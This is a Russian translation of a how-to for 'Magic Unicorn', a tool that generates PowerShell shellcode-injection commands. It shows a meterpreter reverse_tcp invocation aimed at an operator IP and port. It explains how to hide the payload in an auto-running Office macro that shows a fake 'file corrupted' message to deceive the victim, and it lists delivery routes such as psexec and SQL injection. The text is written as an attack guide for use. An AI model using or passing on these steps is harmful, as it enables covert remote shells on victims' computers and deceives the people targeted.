Перевод: Анна Давыдова
Источник: n0where.net
Низкоуровневая атака PowerShell с помощью Unicorn
Магический Единорог (Unicorn) является простым инструментом для использования низкоуровневой атаки PowerShell и введения shellcode прямо в память. Основанный на атаках Matthew Graeber powershell и powershell технике обхода, представленной David Kennedy (TrustedSec) и Josh Kelly на Defcon 18.
Скачать Magic Unicorn
Использование очень доступное, просто запустите Magic Unicorn (убедитесь в том, что Metasploit установлен и предварительно правильно настроен) и magic unicorn автоматически сгенерирует powershell команду, которая вам нужна, чтобы просто вырезать и вставить powershell код в окно командной строки или через систему доставки пейлоад.
root@bt:~/Desktop# python unicorn.py
Unicorn является инструментом инъекции и использования Matthew Graebers атаки и расширяемым до автоматического понижения процесса в случае, если обнаружена 64-битная платформа. Это очень полезно для того, чтобы убедиться, что мы сможем доставить payload только с одним набором shellcode инструкций. Это сработает на любой версии Windows, на которой установлен PowerShell.
Использование:
python unicorn.py payload reverse_ipaddr port
Пример:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Макро Атака
Для макро атаки вам нужно будет перейти в File > Properties > Ribbons, и выбрать Developer. Как только вы сделаете это, у вас появится панель разработчика. Создайте новый макро, назовите его AutoOpen и вставьте сгенерированный код в него. После этого он автоматически запустится.
Обратите внимание: возникнет сообщение, которое сообщит пользователю, что файл поврежден и автоматически закроет документ excel. ЭТО АБСОЛЮТНО НОРМАЛЬНОЕ ПОВЕДЕНИЕ! Это специальный обман жертвы, чтобы она думала, что документ excel поврежден. После этого вы должны получить оболочку через powershell инъекцию.
Инструкции низкоуровневой атаки PowerShell
Все генерируется в два файла, powershell_attack.txt и unicorn.rc.
Текстовый файл содержит весь код, необходимый для внедрения атаки powershell в память.
Обратите внимание, что вам понадобится место, которое поддерживает какую-либо удаленную инъекцию команд. Часто это может происходить через excel/word документы или через psexec_commands внутри Metasploit, SQLi, и т.д. Существует так много значений и сценариев, в которых вы можете использовать эту атаку. Просто вставьте команду powershell_attacks.txt в любое окно командной строки или туда, где у вас есть возможность вызвать исполняемый файл powershell, и он вернет вам оболочку. Обратите внимание, что вам понадобиться доступный слушатель для того, чтобы захватить атаку.